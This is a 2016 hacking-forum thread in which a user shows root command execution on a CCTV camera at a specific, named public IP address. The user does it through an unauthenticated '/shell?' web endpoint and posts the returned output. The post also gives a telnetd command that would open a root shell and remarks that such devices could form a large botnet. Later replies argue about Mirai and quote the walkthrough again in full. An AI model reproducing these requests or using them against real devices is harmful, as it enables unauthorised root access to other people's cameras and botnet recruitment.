The Internet in 2016

[france]

A joke, honestly. Lets just take a look at over 30000 vulnerable CCTV cameras.

Here, lets take a little look. By the way, don't ban me from forum for showing people how many vulnerable devices there are, I am not targeting the forum or any members who use the forum, or used it in the past. I am simply just showing all of you.

Target: 82.38.41.66
ISP: Virgin Media (although this isn't really relevant, lets just include it anyway for memez)

Results from a port scan

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 57

I'm surprised port 23 wasn't open.
Okay so lets connect to 82.38.41.66:80 - This is what we see:

Alright well... Lets just try adding /moo to the request. So this gets returned to us:

          (__)
          (oo) 
    /------\/ 
   /  |   ||   
*   /\---/\   
     ~~    ~~   
...."Have you mooed today?"...

Okay.. So lets try something else, how about /shell?cd%20/;%20ls - This was returned:

a.out
a2.out
bin
dev
etc
lib
linuxrc
media
mnt
nfsroot
proc
root
sbin
sys
tmp
usr
var

So we have shell, plus was returned this on /shell?whoami

root

Yeah, we can do a lot with this. Lets use the remote web shell to start a telnet daemon that's already logged in. If I execute 'ls /usr/sbin' on the remote web shell I can see that telnetd is there, so I could run '/usr/sbin/telnetd -l/bin/sh -p 69' but this isn't really going to be useful to me since I have a remote web shell to play around with anyway.

After if we find a writeable directory which I found in /root/rec (not this specifically). There is a lot more I can do wit this but it's pointless writing anymore, I'm sure some of you will be able to understand what this is and what you could do with it (being there is tens of thousands), you could start a very big botnet, but I am not here to encourage that.

Thanks for reading

- malek

 

[omarhachach]

Very interesting. But you should probably edit out the IP's in the OP, since now it makes you point out a vulnerable victim, encouring us to do something with it. Unless you own it of course.

 

[france]

Very interesting. But you should probably edit out the IP's in the OP, since now it makes you point out a vulnerable victim, encouring us to do something with it. Unless you own it of course.

I don't own it and I am not encouraging anyone on this forum to do anything with it. Posting the IPv4 address harms nobody, and it isn't my fault that security on such devices is an absolute joke. Please don't give me replies like that.

 

[france]

I am not saying that you are encouring anybody, I am saying it could be interpreted as being an encouragment to exploit this website.
So, it is better for you to just block out the IP.

"exploit this website"

Please stop replying.

 

[rippr]

A joke, honestly. Lets just take a look at over 30000 vulnerable CCTV cameras.

Here, lets take a little look. By the way, don't ban me from forum for showing people how many vulnerable devices there are, I am not targeting the forum or any members who use the forum, or used it in the past. I am simply just showing all of you.

Target: 82.38.41.66
ISP: Virgin Media (although this isn't really relevant, lets just include it anyway for memez)

Results from a port scan

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 57

I'm surprised port 23 wasn't open.
Okay so lets connect to 82.38.41.66:80 - This is what we see:

Alright well... Lets just try adding /moo to the request. So this gets returned to us:

          (__)
          (oo)
    /------\/
   /  |   ||  
*   /\---/\  
     ~~    ~~  
...."Have you mooed today?"...

Okay.. So lets try something else, how about /shell?cd%20/;%20ls - This was returned:

a.out
a2.out
bin
dev
etc
lib
linuxrc
media
mnt
nfsroot
proc
root
sbin
sys
tmp
usr
var

So we have shell, plus was returned this on /shell?whoami

root

Yeah, we can do a lot with this. Lets use the remote web shell to start a telnet daemon that's already logged in. If I execute 'ls /usr/sbin' on the remote web shell I can see that telnetd is there, so I could run '/usr/sbin/telnetd -l/bin/sh -p 69' but this isn't really going to be useful to me since I have a remote web shell to play around with anyway.

After if we find a writeable directory which I found in /root/rec (not this specifically). There is a lot more I can do wit this but it's pointless writing anymore, I'm sure some of you will be able to understand what this is and what you could do with it (being there is tens of thousands), you could start a very big botnet, but I am not here to encourage that.

Thanks for reading

- malek

Who the fuck cares for this ? This post is sorta trash, since Mirai has already been leaked & out-there for anyone to use.

 

[france]

Who the fuck cares for this ? This post is sorta trash, since Mirai has already been leaked & out-there for anyone to use.

Okay let me explain this to you, idiot. This post IS NOT TRASH, it is informative and secondly, Mirai has nothing to do with this post so don't come hating on my thread when you clearly have no clue what you're talking about. Oh and also, it doesn't matter if people don't care about the post, I didn't ask people to care about this post, it's an informative post so your post on this is completely irrelevant.

 

[rippr]

Okay let me explain this to you, idiot. This post IS NOT TRASH, it is informative and secondly, Mirai has nothing to do with this post so don't come hating on my thread when you clearly have no clue what you're talking about. Oh and also, it doesn't matter if people don't care about the post, I didn't ask people to care about this post, it's an informative post so your post on this is completely irrelevant.

I'm not sure you understand what Mirai is, mate. Mirai is an IoT botnet, that revolves around CCTV cameras, what your post is literally talking about. I don't think you know much & are just trying to act 1337, right now. You probably fucking Shodan'd this CCTV.

 

[france]

I'm not sure you understand what Mirai is, mate. Mirai is an IoT botnet, that revolves around CCTV cameras, what your post is literally talking about. I don't think you know much & are just trying to act 1337, right now. You probably fucking Shodan'd this CCTV.

Well no, I don't agree. Mirai doesn't specifically target security cameras. Anything IoT devices running telnet service will be a potential target to this malware (or others) using the credentials below

(couldn't fit it all in)

 

[rippr]

Well no, I don't agree. Mirai doesn't specifically target security cameras. Anything IoT devices running telnet service will be a potential target to this malware (or others) using the credentials below

(couldn't fit it all in)

I guess, but it mainly focuses on CCTV cameras. Which is why it got known, it used like 400,000, right?

 

[france]

I guess, but it mainly focuses on CCTV cameras. Which is why it got known, it used like 400,000, right?

Well, it isn't specifically Mirai. There are many other pieces of malware which can be used to infect these vulnerable devices.